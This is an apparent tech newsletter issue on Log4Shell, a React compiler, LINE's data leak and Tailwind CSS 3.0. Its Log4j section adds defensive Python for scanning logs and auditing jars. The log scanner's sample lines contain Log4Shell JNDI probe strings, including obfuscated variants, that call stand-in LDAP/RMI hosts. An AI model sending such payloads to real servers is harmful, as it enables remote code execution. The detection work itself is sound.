360° IT Check #25 — Log4j, Optimizing React, And More!

Log4j Vulnerability

When your logging framework starts to execute arbitrary code, you know you’re in trouble.

Log4j, the widely used Java logging library, contained a vulnerability (CVE-2021-44228, dubbed Log4Shell) that affected many apps you might have been using, including Twitter, iCloud, and Steam. That list is much shorter than it could have been: Log4j is likely present in “almost all” major Java-based enterprise apps and servers. Not even the NSA was safe, as its popular reverse-engineering tool GHIDRA was vulnerable as well.

According to GreyNoise, a company that analyzes “Internet background noise”, around 100 hosts were actively scanning the Internet for servers exposed to the vulnerability at the time of writing.

To check whether your server was scanned, compare your access logs against the list of scanning IPs in this GitHub gist. Many of those IPs, however, are Tor exit nodes, so the list will keep getting longer; treat it as a starting point rather than an exhaustive blocklist.
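As an added example (not part of the original newsletter and not any vendor's tool), here is a small scanner over constructed access-log lines that does what an IP-list check cannot: it finds the `${jndi:...}` probe strings themselves, after URL-decoding and undoing the common lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) that defeat a plain substring search. The IPs, callback hosts and log lines are made up.

```python
"""Scan web-server access logs for Log4Shell (CVE-2021-44228) probe strings.

Hypothetical example: detects ${jndi:...} lookups after URL-decoding and
undoing the common obfuscations (${lower:x}, ${upper:x}, ${::-x} defaults,
${env:NOPE:-x}) that bypass a naive 'jndi:' substring match.
"""
import re
from urllib.parse import unquote

# Innermost ${...} token: a body that contains no further braces.
TOKEN = re.compile(r"\$\{([^{}]*)\}")
# Scheme and callback host of a resolved jndi: lookup.
CALLBACK = re.compile(r"jndi:([a-z]+)://([^/\s]+)", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way the attacker intends it to resolve."""
    if ":-" in body:                       # ${x:y:-default} -> default (also ${::-j})
        return body.split(":-", 1)[1]
    prefix, _, key = body.partition(":")
    if prefix.lower() == "lower":          # ${lower:J} -> j
        return key.lower()
    if prefix.lower() == "upper":
        return key.upper()
    return body                            # unknown lookup: keep the text, drop the braces


def normalize(text: str, max_rounds: int = 200):
    """Return (normalized text, list of resolved 'jndi:...' bodies found)."""
    text = unquote(unquote(text))          # undo single and double URL-encoding
    findings = []
    for _ in range(max_rounds):
        m = TOKEN.search(text)
        if not m:
            break
        body = m.group(1)
        if body.lower().lstrip().startswith("jndi:"):
            findings.append(body)
            replacement = "<<JNDI>>"       # brace-free placeholder so the loop ends
        else:
            replacement = _resolve(body)
        text = text[: m.start()] + replacement + text[m.end():]
    return text, findings


def scan_log(log_text: str):
    """Return one hit per JNDI lookup found, with source IP, scheme and callback host."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        _, findings = normalize(line)
        for body in findings:
            m = CALLBACK.search(body)
            hits.append({
                "line": lineno,
                "src": line.split()[0],
                "scheme": m.group(1).lower() if m else None,
                "callback": m.group(2) if m else None,
                "payload": body,
            })
    return hits


# Constructed sample lines in Apache combined format (not real traffic).
LOG_LINES = """\
198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"
198.51.100.8 - - [10/Dec/2021:14:03:52 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fb%7D HTTP/1.1" 404 153 "-" "curl/7.68.0"
198.51.100.9 - - [10/Dec/2021:14:05:01 +0000] "GET /login HTTP/1.1" 200 917 "-" "Mozilla/5.0"
198.51.100.10 - - [10/Dec/2021:14:06:30 +0000] "POST /api HTTP/1.1" 200 20 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10/x}" "Mozilla/5.0"
198.51.100.11 - - [10/Dec/2021:14:07:03 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 917 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(f"line {hit['line']}: {hit['src']} -> {hit['scheme']}://{hit['callback']}  [{hit['payload']}]")
```

Run against the constructed lines, it flags three probes (plain, URL-encoded with a `${lower:j}` trick, and a fully `${::-x}`-built `rmi://` payload) and ignores the harmless `${date:yyyy}` on the last line. The callback host is the useful pivot: it is the attacker's LDAP/RMI server, so it belongs in your egress logs and blocklists, not just the scanning source IP.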

Luckily, mitigating the vulnerability is simple. As Cloudflare explained it at the time:

1. Upgrade to Log4j v2.15.0

2. If you are using Log4j v2.10 or above, and cannot upgrade, then set the property:

log4j2.formatMsgNoLookups=true

Additionally, an environment variable can be set for these same affected versions:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

3. Or remove the JndiLookup class from the classpath. For example, you can run a command like

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

to remove the class from log4j-core.

Note that this advice was overtaken within days: 2.15.0 and the formatMsgNoLookups setting turned out to be incomplete fixes (CVE-2021-45046), and Apache's guidance became to upgrade to 2.17.0 or later (2.12.3 on Java 7, 2.3.1 on Java 6). Removing JndiLookup.class from every copy of log4j-core on the classpath, including copies bundled inside fat jars and WAR files, remains a sound stop-gap when you cannot upgrade immediately.
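As an added example in the spirit of step 3 (this is not Cloudflare's or Apache's code), the following Python audits a jar, war or ear for copies of log4j-core, including ones nested inside other archives where a filesystem search for `log4j-core-*.jar` would miss them, reports each copy's version against the fixed releases, and rewrites an archive without JndiLookup.class, which is what the `zip -d` command does. The archive contents are constructed stubs, not real Log4j class files; `make_log4j_core` and `build_zip` are test helpers.

```python
"""Audit a jar/war/ear for vulnerable log4j-core copies and strip JndiLookup.class.

Hypothetical example: a pure-Python counterpart to the 'zip -q -d' step, plus a
version check and recursion into nested archives (fat jars, WEB-INF/lib).
"""
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(version):
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version or "")
    return tuple(int(x) for x in m.groups()) if m else None


def is_fixed(version):
    """True if the version carries the fixes for CVE-2021-44228/-45046/-45105
    (Apache advisory: 2.17.0+, or 2.12.3+ on Java 7, 2.3.1+ on Java 6)."""
    v = parse_version(version)
    if v is None:
        return False
    if v[:2] == (2, 3):
        return v >= (2, 3, 1)
    if v[:2] == (2, 12):
        return v >= (2, 12, 3)
    return v >= (2, 17, 0)


def audit(data, path="<root>", findings=None):
    """Recursively inspect an archive (bytes); return one finding per log4j-core copy."""
    findings = [] if findings is None else findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:   # log4j-core, or a shaded copy of it
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            findings.append({"path": path, "version": version,
                             "has_jndi_lookup": JNDI_CLASS in names,
                             "fixed": is_fixed(version)})
        for name in sorted(names):                       # descend into embedded archives
            if name.lower().endswith((".jar", ".war", ".ear")):
                audit(zf.read(name), f"{path}!/{name}", findings)
    return findings


def remove_jndi_lookup(data):
    """Rewrite the archive without JndiLookup.class (same effect as 'zip -d')."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_zip(entries):
    """Build an in-memory archive from {name: bytes-or-str} (constructed test data)."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        for name, blob in entries.items():
            zf.writestr(name, blob)
    return out.getvalue()


def make_log4j_core(version, with_jndi=True):
    """A minimal fake log4j-core jar: pom.properties plus stub class files."""
    entries = {
        POM_PROPS: f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n",
        "org/apache/logging/log4j/core/Logger.class": b"\xca\xfe\xba\xbe",  # class magic only
    }
    if with_jndi:
        entries[JNDI_CLASS] = b"\xca\xfe\xba\xbe"
    return build_zip(entries)


if __name__ == "__main__":
    war = build_zip({"WEB-INF/lib/log4j-core-2.14.1.jar": make_log4j_core("2.14.1")})
    print(audit(war))                      # nested copy, 2.14.1, JndiLookup present
    patched = remove_jndi_lookup(make_log4j_core("2.14.1"))
    print(audit(build_zip({"WEB-INF/lib/log4j-core-2.14.1.jar": patched})))
```

In practice you would feed `audit` the bytes of every `*.jar`, `*.war` and `*.ear` under your application and container image directories. A finding with `fixed: False` and `has_jndi_lookup: True` is the case the `zip -d` step addresses; a finding with `has_jndi_lookup: False` but an old version still warrants an upgrade, since stripping the class only neutralises the JNDI path.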

React’s Automatic Optimizations

React is a bit of a “you have to do everything yourself” UI library. Without explicit optimizations, such as memoization, it performs rather poorly, unnecessarily running a lot of code over and over. Having to keep this in mind, along with some other React-specific optimizations, can be a bit of a pickle.

Engineers at Meta seem to have noticed that, and have showcased a tool that makes React perform much better without all the mental overhead for developers. The solution is a compiler that performs the memoization for you, automatically. For a demo, watch the video below.

Line’s Leak

If you ever push a commit with your private key to a public GitHub repository, believe it or not, this is not the worst thing that can happen. LINE leaked payment data on 133,000 users to GitHub. The leaked data contained details of participants in a “LINE Pay” promotional program: date, time, and user IDs. Even though no credit card or bank account details saw the light of day, the company admitted that individuals could have been “traced with a little effort.”

The leak happened between September and November 2021; however, the news about it only surfaced last week. The company promised to do better in the future.

Tailwind CSS 3.0

Tailwind CSS, one of web developers’ favorite tools for creating beautiful UI components, is getting a new major release. It brings improvements that make developers’ lives easier as well as new features with new capabilities.

  • “Just-in-Time, all the time.” Faster build times for the CSS framework: the JIT engine, optional until now, is the only engine in 3.0. It is also available as a script that you can load from the CDN and run in the browser
  • The introduction of scroll snap utilities
  • Styling of form elements without much time or effort
  • The introduction of RTL and LTR modifiers, essential for complete control when building multi-directional websites
  • “Touch-action” utilities for controlling how a user can zoom and scroll on touch-screen devices

For the full list of features in the new release, take a look at the documentation.

360° IT Check is a weekly publication where we bring you the latest and greatest in the world of tech. We cover topics like emerging technologies & frameworks, news about innovative startups, and other topics which affect the world of tech directly or indirectly.

Like what you’re reading? Make sure to subscribe to our weekly newsletter!